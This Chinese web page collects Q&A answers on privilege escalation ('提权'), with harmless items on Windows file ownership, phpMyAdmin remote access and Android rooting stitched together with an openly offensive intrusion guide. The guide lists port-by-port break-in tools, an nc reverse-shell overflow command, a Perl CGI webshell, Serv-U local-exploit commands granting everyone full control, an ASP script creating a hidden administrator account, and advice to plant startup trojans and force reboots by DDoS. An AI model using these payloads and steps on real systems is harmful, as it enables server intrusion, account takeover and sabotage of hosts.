您的位置:

php.exe提权,php提权linux教程

本文目录一览:

怎样注入PHP网站提权3389权限

查找可用的注入点,注入后得到管理员帐号密码进后台传小马后再大马提权OK

WINDOWS 7 怎样完全提权???

新建一个文本文档 复制以下内容到新建的文档中

Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\*\shell\runas]

@="获取管理员权限"

"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\*\shell\runas\command]

@="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"

"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\exefile\shell\runas2]

@="获取管理员权限"

"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\exefile\shell\runas2\command]

@="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"

"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" icacls \"%1\" /grant administrators:F"

[HKEY_CLASSES_ROOT\Directory\shell\runas]

@="获取管理员权限"

"NoWorkingDirectory"=""

[HKEY_CLASSES_ROOT\Directory\shell\runas\command]

@="cmd.exe /c takeown /f \"%1\" /r /d y icacls \"%1\" /grant administrators:F /t"

"IsolatedCommand"="cmd.exe /c takeown /f \"%1\" /r /d y icacls \"%1\" /grant administrators:F /t"

现在关闭此文档 并且文件名保存为 提权.reg

现在打开刚才做好的文件 点击确定导入注册表

在需要提权的文件上点击右键 会有一个获取管理员权限选项 点击一个黑框闪过

你就提权了。。。。如果是一个目录黑框会多显示一会 待它自动关闭即可

php提权能控制整个主机吗,如同从本机登陆远程3389主机

2/4分步阅读

远程连接服务器之前首先需要把基本的准备工作做好,比如首先在服务器创建一个新的网站,并把相应的网站内容上传好。

我这里以wdcp linux服务器为例子,如下图所示创建一个新的网站

2/3

通过flashfxp等软件将网站上传至服务器

3/3

进入phpmyadmin,导入sql文件

连接远程数据库

1/4

选择该数据库,然后点击权限,可以看到如下图所示,然后点击下方添加新用户

2/4

然后输入新用户信息:

1、输入用户名

2、主机:选择任意主机,然后输入 % 

(开启mysql本身的远程连接,简单说,就是在创建mysql用户时的主机名,使用IP,域名,或%号就可以,"%"代表所有,也就是任何人和机器都可以连接,只要有用户密码,也可以针对IP,域名来做限制)

3、生成密码

4、全局权限:全选

5、最后执行

3/4

通过以上步骤就生成了一个可以远程访问的数据库,然后通过更改网站配置文件,php文件配置路径如下图,选择database.php,然后打开文件

如何找漏洞,又怎样利用它提权

1. 1433端口入侵

scanport.exe 查有1433的机器

SQLScanPass.exe 进行字典暴破(字典是关键)

最后 SQLTools.exe入侵

对sql的sp2及以下的系统,可用sql的hello 溢出漏洞入侵。

nc -vv -l -p 本机端口 sqlhelloF.exe 入侵ip 1433 本机ip 本机端口

(以上反向的,测试成功)

sqlhelloz.exe 入侵ip 1433 (这个是正向连接)

2. 4899端口入侵

用4899过滤器.exe,扫描空口令的机器

3. 3899的入侵

对很早的机器,可以试试3389的溢出(win3389ex.exe)

对2000的机器,可以试试字典暴破。(tscrack.exe)

4. 80入侵

对sp3以前的机器,可以用webdav入侵;

对bbs论坛,可以试试上传漏洞(upfile.exe或dvup_delphi.exe)

可以利用SQL进行注入。(啊D的注入软件)。

5. serv-u入侵(21端口)

对5. 004及以下系统,可用溢出入侵。(serv5004.exe)

对5.1.0.0及以下系统,可用本地提升权限。(servlocal.exe)

对serv-u的MD5加密密码,可以用字典暴破。(crack.vbs)

输入一个被serv-u加密的密码(34位长),通过与字典档(dict.txt)的比较,得到密码

6. 554端口

用real554.exe入侵。

7. 6129端口

用DameWare6129.exe入侵。

8. 系统漏洞

利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞,

进行溢出入侵。

9. 3127等端口

可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查)。

10. 其他入侵

利用shanlu的入侵软件入侵(WINNTAutoAttack.exe)。

经典IPC$入侵

本篇文章结合了许多高手提升权限的技巧和自己的一些想法

当我们取得一个webshell时候,下一部要做的就是提升权限

个人总结如下:

1: C:\Documents and Settings\All Users\Application Data\Symantec\pcAnywhere\

看能否跳转到这个目录,如果行那就最好了,直接下它的CIF文件,得到pcAnywhere密码,登陆

2.C:\WINNT\system32\config\

进这里下它的SAM,破解用户的密码

用到破解sam密码的软件有LC,SAMinside

3.C:\Documents and Settings\All Users\「开始」菜单\程序\

看这里能跳转不,我们从这里可以获取好多有用的信息

可以看见好多快捷方式,我们一般选择Serv-U的,然后本地查看属性,知道路径后,看能否跳转

进去后,如果有权限修改ServUDaemon.ini,加个用户上去,密码为空

[USER=WekweN|1]

Password=

HomeDir=c:\

TimeOut=600

Maintenance=System

Access1=C:\|RWAMELCDP

Access1=d:\|RWAMELCDP

Access1=f:\|RWAMELCDP

SKEYValues=

这个用户具有最高权限,然后我们就可以ftp上去 quote site exec xxx 来提升权限

4.c:\winnt\system32\inetsrv\data\

就是这个目录,同样是erveryone 完全控制,我们所要做的就是把提升权限的工具上传上去,然后执行

5.看能否跳转到如下目录

c:\php, 用phpspy

c:\prel,有时候不一定是这个目录(同样可以通过下载快捷方式看属性获知)用cgi的webshell

#!/usr/bin/perl

binmode(STDOUT);

syswrite(STDOUT, "Content-type: text/html\r\n\r\n", 27);

$_ = $ENV{QUERY_STRING};

s/%20/ /ig;

s/%2f/\//ig;

$execthis = $_;

syswrite(STDOUT, "HTMLPRE\r\n", 13);

open(STDERR, "STDOUT") || die "Can't redirect STDERR";

system($execthis);

syswrite(STDOUT, "\r\n/PRE/HTML\r\n", 17);

close(STDERR);

close(STDOUT);

exit;

保存为cgi执行,

如果不行,可以试试 pl 扩展呢,把刚才的 cgi 文件改为 pl 文件,提交

显示"拒绝访问",表示可以执行了!马上提交:先的上传个su.exe(ser-u提升权限的工具)到 prel的bin目录

\perl\bin\su.exe

返回:

Serv-u 3.x Local Exploit by xiaolu

USAGE: serv-u.exe "command"

Example: serv-u.exe "nc.exe -l -p 99 -e cmd.exe"

现在是 IUSR 权限,提交:

\perl\bin\su.exe "cacls.exe c: /E /T /G everyone:F"

\perl\bin\su.exe "cacls.exe d: /E /T /G everyone:F"

\perl\bin\su.exe "cacls.exe e: /E /T /G everyone:F"

\perl\bin\su.exe "cacls.exe f: /E /T /G everyone:F"

如果返回下面的信息,就表示成功了

Serv-u 3.x Local Exploit by xiaolu

220 Serv-U FTP Server v5.2 for WinSock ready...

USER LocalAdministrator

331 User name okay, need password.

******************************************************

PASS #l@$ak#.lk;0@P

230 User logged in, proceed.

******************************************************

SITE MAINTENANCE

******************************************************

[+] Creating New Domain...

200-DomainID=2

220 Domain settings saved

******************************************************

[+] Domain xl:2 Created

[+] Creating Evil User

200-User=xl

200 User settings saved

******************************************************

[+] Now Exploiting...

USER xl

331 User name okay, need password.

******************************************************

PASS 111111

230 User logged in, proceed.

******************************************************

[+] Now Executing: cacls.exe c: /E /T /G everyone:F

220 Domain deleted

这样所有分区为everyone完全控制

现在我们把自己的用户提升为管理员:

\perl\bin\su.exe " net localgroup administrators IUSR_anyhost /add"

6.可以成功运行"cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps"来提升权限

用这个cscript C:\Inetpub\AdminScripts\adsutil.vbs get w3svc/inprocessisapiapps

查看有特权的dll文件:idq.dll httpext.dll httpodbc.dll ssinc.dll msw3prt.dll

再将asp.dll加入特权一族

asp.dll是放在c:\winnt\system32\inetsrv\asp.dll (不同的机子放的位置不一定一样)

我们现在加进去cscript adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\httpodbc.dll" "C:\WINNT\system32\inetsrv\ssinc.dll" "C:\WINNT\system32\msw3prt.dll""c:\winnt\system32\inetsrv\asp.dll"

可以用cscript adsutil.vbs get /W3SVC/InProcessIsapiApps 来查看是不是加进去了

7.还可以用这段代码试提升,好象效果不明显

%@codepage=936%%Response.Expires=0

on error resume next

Session.TimeOut=50

Server.ScriptTimeout=3000

set lp=Server.CreateObject("WSCRIPT.NETWORK")

oz="WinNT://"lp.ComputerName

Set ob=GetObject(oz)

Set oe=GetObject(oz"/Administrators,group")

Set od=ob.Create("user","WekweN$")

od.SetPassword "WekweN" -----密码

od.SetInfo

Set of=GetObject(oz"/WekweN$,user")

oe.Add(of.ADsPath)

Response.write "WekweN$ 超级帐号建立成功!"%

用这段代码检查是否提升成功

%@codepage=936%

%Response.Expires=0

on error resume next '查找Administrators组帐号

Set tN=server.CreateObject("Wscript.Network")

Set objGroup=GetObject("WinNT://"tN.ComputerName"/Administrators,group")

For Each admin in objGroup.Members

Response.write admin.Name"br"

Next

if err then

Response.write "不行啊:Wscript.Network"

end if

%

8.C:\Program Files\Java Web Start\

这里如果可以,一般很小,可以尝试用jsp的webshell,听说权限很小,本人没有遇见过。

9.最后了,如果主机设置很变态,可以试下在c:\Documents and Settings\All Users\「开始」菜单\程序\启动"写入bat,vbs等木马。

等到主机重启或者你ddos逼它重启,来达到权限提升的目的。

总结起来说就是,找到有执行和写入的目录,管他什么目录,然后上传提升工具,最后执行,三个字"找" "上""执"

以上是本人的拙见,大家有什么好的方法多多分享

如何用手机提权u880,2.2.2的,谢谢

工具自己找下吧

U880提权及刷入recovery的方法和步骤

方法一:使用子规制作的一键root、刷入recovery包提权、刷入recovery。

步骤1:安装相应ROM版本的joinme软件(没有刷B10版本底包的同学可直接用官方标配的光盘安装,已经硬刷至B10版本的同学请卸载旧版Joinme后,将手机连接电脑后点击我的电脑---点击名为JOINME的盘符——安装JOINME);安装结束后右键我的电脑---进入设备管理器, 发现有ADB interface项之后便可进行ROOT操作了,如果未发现请重启计算机再试。 2011-8-2 21:50:13 上传下载附件 (9.29 KB)

步骤2:下载子规制作的一键root、添加recovery包并解压至电脑任意盘符下(不可放入手机SD卡上运行),在此过程中杀毒软件会报发现病毒,将ROOT程序设为信任就可以了,实在不行请先关闭杀毒软件。

步骤3:运行“一键ROOT-u880-v2.1.exe”文件,然后按照指示完成操作就可以完成提权(在重启机器之后,在程序列表里出现一个叫授权管理的小骷髅头,那说明你成功ROOT了) 或刷入recovery了。

2011-8-2 21:53:55 上传下载附件 (83.34 KB)

方法二:

步骤1:同以上方法的步骤一。

步骤2:下载并打开superoneclick,在Universal界面下点击root键就可以了,在重启机器之后,在程序列表里出现一个叫授权管理的小骷髅头,那说明你成功ROOT了。

2011-8-2 22:17:32 上传下载附件 (39.82 KB)

数据银行网盘附件:

【DBank网盘】SuperOneClick v1.9.1.rar(1.37M)

数据银行网盘附件:

【DBank网盘】